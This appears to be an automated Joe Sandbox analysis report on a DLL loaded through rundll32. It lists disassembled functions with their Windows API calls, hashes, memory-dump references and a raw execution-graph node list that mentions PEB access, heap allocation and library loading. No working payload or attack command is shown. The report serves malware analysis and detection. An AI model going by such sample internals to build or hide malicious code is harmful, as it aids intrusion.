                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction ID: 8d1cfe8ad11ec7d0de67206570733d2bfe4fd9a2d1bcb630a2e9799106cb1609
                                                                                                                      • Opcode Fuzzy Hash: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction Fuzzy Hash: F0E0ED318942B4CBEB04EB20EDC83993BE8FB46305F524526D04693165DF346C99DE62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:8.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1021
                                                                                                                      Total number of Limit Nodes:15
                                                                                                                      execution_graph 7863 74c82c 7868 751b54 7863->7868 7865 74c8a7 7905 743cbb 7865->7905 7867 74c8b7 7877 752dac 7868->7877 7884 75365e 7877->7884 7891 7368de GetPEB 7877->7891 7895 74eae6 RtlAllocateHeap GetPEB 7877->7895 7897 752e0a 7877->7897 7898 73ebf2 RtlAllocateHeap GetPEB 7877->7898 7900 752e25 7877->7900 7904 73ae03 GetPEB 7877->7904 7908 74b391 7877->7908 7919 742bf6 7877->7919 7932 73f93d 7877->7932 7942 7474dd 7877->7942 7956 74be8c 7877->7956 7964 740f7b 7877->7964 7968 7370ed 7877->7968 7988 73e243 7877->7988 7998 736083 7877->7998 8008 73b186 7877->8008 8013 7383a1 7877->8013 8016 744b56 7877->8016 8022 73911a 7877->8022 8034 74d8d7 7877->8034 8046 735e0b 7877->8046 8050 73c309 7877->8050 8059 74129c 7877->8059 8066 73ae9a 7877->8066 8071 736c29 7877->8071 8076 74ebff 7877->8076 8085 7404b8 7877->8085 8092 73c24a 7877->8092 8096 732830 7877->8096 8107 73fd8c 7877->8107 8111 73b821 7877->8111 8118 73f435 7877->8118 8121 733fb8 7884->8121 7891->7877 7895->7877 7978 749186 7897->7978 7898->7877 7900->7865 7904->7877 7906 732d9f GetPEB 7905->7906 7907 743d36 ExitProcess 7906->7907 7907->7867 7916 74b793 7908->7916 7911 74b988 8160 744dad 7911->8160 7912 74b986 7912->7877 7916->7911 7916->7912 8136 735d65 7916->8136 8140 74e938 7916->8140 8144 73ab66 7916->8144 8148 73e7ce 7916->8148 8152 73ae03 7916->8152 8156 74bbb2 7916->8156 7930 743273 7919->7930 7920 73ab66 2 API calls 7920->7930 7922 743400 7924 74e689 2 API calls 7922->7924 7925 74341c 7924->7925 7925->7877 7930->7920 7930->7922 7930->7925 7931 73ae03 GetPEB 7930->7931 8219 74ee94 7930->8219 8230 740188 7930->8230 8234 73eb36 7930->8234 8238 73ea7b 7930->8238 8242 74e689 7930->8242 8246 74bdb5 7930->8246 7931->7930 7940 73fc5c 7932->7940 7933 73fd67 8283 74e498 7933->8283 7936 73fd65 7936->7877 7938 73ab66 2 API calls 7938->7940 7939 73e7ce GetPEB 7939->7940 7940->7933 7940->7936 7940->7938 7940->7939 7941 73ae03 GetPEB 7940->7941 8269 738d95 7940->8269 8293 7512a8 7940->8293 7941->7940 7953 7479ea 7942->7953 7943 743512 RtlAllocateHeap GetPEB 7943->7953 7945 747b7e 7946 7368de GetPEB 7945->7946 7948 747b99 7946->7948 7947 747b5f 8337 737027 7947->8337 7951 7368de GetPEB 7948->7951 7950 747b5d 7950->7877 7951->7950 7952 73ab66 2 API calls 7952->7953 7953->7943 7953->7945 7953->7947 7953->7950 7953->7952 7955 73ae03 GetPEB 7953->7955 8329 740eda 7953->8329 8333 73c795 7953->8333 7955->7953 7962 74c16a 7956->7962 7958 74bbb2 GetPEB 7958->7962 7959 74e938 2 API calls 7959->7962 7960 744dad 2 API calls 7960->7962 7961 7512a8 GetPEB 7961->7962 7962->7958 7962->7959 7962->7960 7962->7961 7963 74c297 7962->7963 8341 74bc49 7962->8341 7963->7877 7965 740f95 7964->7965 7966 741099 7965->7966 7967 73ec9b RtlAllocateHeap GetPEB LoadLibraryW 7965->7967 7966->7877 7967->7965 7971 7373a5 7968->7971 7970 73ea7b 2 API calls 7970->7971 7971->7970 7972 73eb36 2 API calls 7971->7972 7973 74e689 2 API calls 7971->7973 7974 7374d5 7971->7974 7976 743512 2 API calls 7971->7976 7977 7374d3 7971->7977 8345 73e86a 7971->8345 7972->7971 7973->7971 7975 7512a8 GetPEB 7974->7975 7975->7977 7976->7971 7977->7877 7986 7491a1 7978->7986 7979 73ea7b 2 API calls 7979->7986 7980 73ab66 RtlAllocateHeap GetPEB 7980->7986 7981 74981f 8360 739700 7981->8360 7983 7496a3 7983->7900 7984 74bdb5 GetPEB 7984->7986 7986->7979 7986->7980 7986->7981 7986->7983 7986->7984 7987 73ae03 GetPEB 7986->7987 8356 735f83 7986->8356 7987->7986 7992 73e562 7988->7992 7989 73e702 8392 73fff2 7989->8392 7992->7989 7994 73e700 7992->7994 7996 7368de GetPEB 7992->7996 8374 73f4bd 7992->8374 8378 74e35a 7992->8378 8381 74561f 7992->8381 8388 73bc8a 7992->8388 7994->7877 7996->7992 8003 7360b9 7998->8003 8002 7368c5 8002->7877 8003->8002 8004 751310 GetPEB 8003->8004 8005 7368de GetPEB 8003->8005 8400 742753 8003->8400 8410 746864 8003->8410 8428 731f9b 8003->8428 8438 73bd0f 8003->8438 8447 747bca 8003->8447 8004->8003 8005->8003 8610 75074a 8008->8610 8014 735e0b GetPEB 8013->8014 8015 738405 8014->8015 8015->7877 8019 744c7f 8016->8019 8020 744d5e 8019->8020 8617 744fa8 8019->8617 8621 73c706 8019->8621 8624 751993 8019->8624 8020->7877 8029 739139 8022->8029 8024 743512 2 API calls 8024->8029 8028 7395bc 8028->7877 8029->8024 8029->8028 8662 736a1f 8029->8662 8669 745040 8029->8669 8677 74a429 8029->8677 8689 73472e 8029->8689 8710 732fa1 8029->8710 8731 737b82 8029->8731 8743 740946 8029->8743 8751 7388f4 8029->8751 8035 74e021 8034->8035 8036 74ba68 GetPEB 8035->8036 8037 73ea7b 2 API calls 8035->8037 8039 74e28e 8035->8039 8042 74e28c 8035->8042 8043 73ab66 RtlAllocateHeap GetPEB 8035->8043 8044 73ae03 GetPEB 8035->8044 8045 74bdb5 GetPEB 8035->8045 8868 738786 8035->8868 8872 74c2ce 8035->8872 8036->8035 8037->8035 8876 737af8 8039->8876 8042->7877 8043->8035 8044->8035 8045->8035 8047 735e24 8046->8047 8048 732d9f GetPEB 8047->8048 8049 735ea8 8048->8049 8049->7877 8057 73c589 8050->8057 8051 73c651 8880 731950 8051->8880 8052 73c64f 8052->7877 8054 744fa8 GetPEB 8054->8057 8055 73ab66 2 API calls 8055->8057 8056 73e7ce GetPEB 8056->8057 